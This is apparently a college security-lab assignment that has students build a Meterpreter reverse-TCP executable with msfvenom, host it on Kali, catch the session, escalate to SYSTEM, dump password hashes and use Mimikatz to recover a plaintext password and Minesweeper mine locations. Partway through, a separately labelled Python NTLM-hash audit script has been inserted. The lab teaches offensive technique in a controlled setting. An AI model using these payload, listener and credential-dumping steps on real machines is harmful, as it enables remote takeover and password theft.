4.1: Mimikatz (15 pts. extra credit)

What You Need


We will use Kali Linux and Metasploit to create an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
Find your IP address and make a note of it. In the example below, it is

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.


If msfvenom crashes on a line in the "android.rb" file, try editing that file and viewing that line. It may define a certificate that is valid for 20 years. Delete the "0" to make it valid for only 2 years to fix the error.

Another workaround is to use 64-bit Kali; msfvenom works better on that OS.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Metasploit starts a "reverse TCP handler", as shown below.

Putting a Password on the Target Machine

On the target Windows machine, click Start, "Control Panel", "User Accounts", "Change your Windows password", "Create a password for your account".

Enter a password of P@ssw0rd in both the password boxes, as shown below.

Click the "Create password" button.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpreter session opens, as shown below.

Privilege Escalation and Stealing Password Hashes

On your Kali machine, at meterpreter > prompt, execute this command:
As shown below, we have Administrator privileges.

To steal the plaintext password from memory, we need to run as SYSTEM, which is more powerful than the Administrator account.

On your Kali machine, at meterpreter > prompt, execute these commands:

"getuid" reports that you have SYSTEM privileges now, as shown below.

On your Kali machine, at meterpreter > prompt, execute this command:

You see password hashes, as shown below.
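Before cracking anything, it is worth checking hashdump's output for the obvious weak cases. The following is an added example, not code from the original project: it parses the user:RID:LM-hash:NT-hash::: lines hashdump prints, computes the NT hash (MD4 over the UTF-16LE password) for a short list of guesses such as the lab password P@ssw0rd, and flags accounts with an empty password, a stored LM hash, or a password that matches a guess. MD4 is implemented inline because hashlib omits it on many current OpenSSL builds. The hashdump lines, the guess list and the function names (md4, ntlm_hash, parse_hashdump, audit_hashdump) are all constructed for this example.

```python
import struct

_MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Constructed sample in hashdump's user:RID:LM:NT::: format (not real output).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
student:1000:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
"""


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; Windows uses it over the UTF-16LE password for the NT hash."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    # Padding: 0x80, zeros to 56 mod 64, then the bit length as little-endian u64.
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for func, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                j = (-i) % 4  # word being updated cycles a, d, c, b, a, ...
                t = (s[j] + func(s[(j + 1) % 4], s[(j + 2) % 4], s[(j + 3) % 4])
                     + x[idx] + k) & _MASK
                s[j] = _rotl(t, shifts[i % 4])
        state = [(a + b) & _MASK for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def ntlm_hash(password: str) -> str:
    """NT hash as the lowercase hex string hashdump prints."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str):
    """Split hashdump lines into (user, rid, lm, nt) tuples, skipping other output."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(nt) == 32:
            entries.append((user, rid, lm, nt))
    return entries


def audit_hashdump(text: str, guesses) -> dict:
    """Map each account name to a list of findings; one hash per guess, not per account."""
    lookup = {ntlm_hash(p): p for p in guesses}
    findings = {}
    for user, _rid, lm, nt in parse_hashdump(text):
        issues = []
        if lm != EMPTY_LM:
            issues.append("LM hash stored")        # trivially crackable, 14-char max
        if nt == EMPTY_NT:
            issues.append("empty password")
        elif nt in lookup:
            issues.append("password is " + lookup[nt])
        findings[user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_hashdump(SAMPLE_HASHDUMP, ["password", "P@ssw0rd"]).items():
        print(f"{user}: {', '.join(issues) or 'no finding'}")
```

Paste the real hashdump output into SAMPLE_HASHDUMP (or read it from a file) and extend the guess list; because the NT hash is unsalted, each guess costs one MD4 computation no matter how many accounts are in the dump, which is why a short list of lab passwords is checked before any real cracking run.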

Stealing a Plaintext Password

We could try to crack those hashes to get passwords, but that might be a lot of work.

Fortunately, on this generation of Windows the WDigest security package keeps the password of the currently logged-on user in LSASS memory in a reversibly encrypted form, so we can steal it directly :). (Newer Windows versions, and older ones with KB2871997 applied, no longer cache WDigest plaintext by default, so this step can come back empty there.)

On your Kali machine, at meterpreter > prompt, execute these commands:

load mimikatz
The plaintext password is revealed, as highlighted in the image below!

Winning at Minesweeper

On your host system, in a Web browser, go to


Click DOWNLOAD. A Winmine__XP.exe file downloads.

Rename this file to winmine.exe

Drag the winmine.exe file into your Windows machine and run it, as shown below.

This is a game in which you must click on the empty squares, avoiding the squares that contain mines.

On your Kali machine, at meterpreter > prompt, execute these commands:

mimikatz_command -f winmine::infos
Mimikatz reads the locations of the mines from RAM and displays them, as shown below.

Play the game and win it, using the information from Mimikatz.

When you win, you see the screen below. Part of the message is redacted in the image below.

Recording Your Success

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.


Updated 5-23-18 to run as a CTF
Slight changes 6-4-18
Android.rb fix added 6-14-18
Integrated with Canvas 6-27-18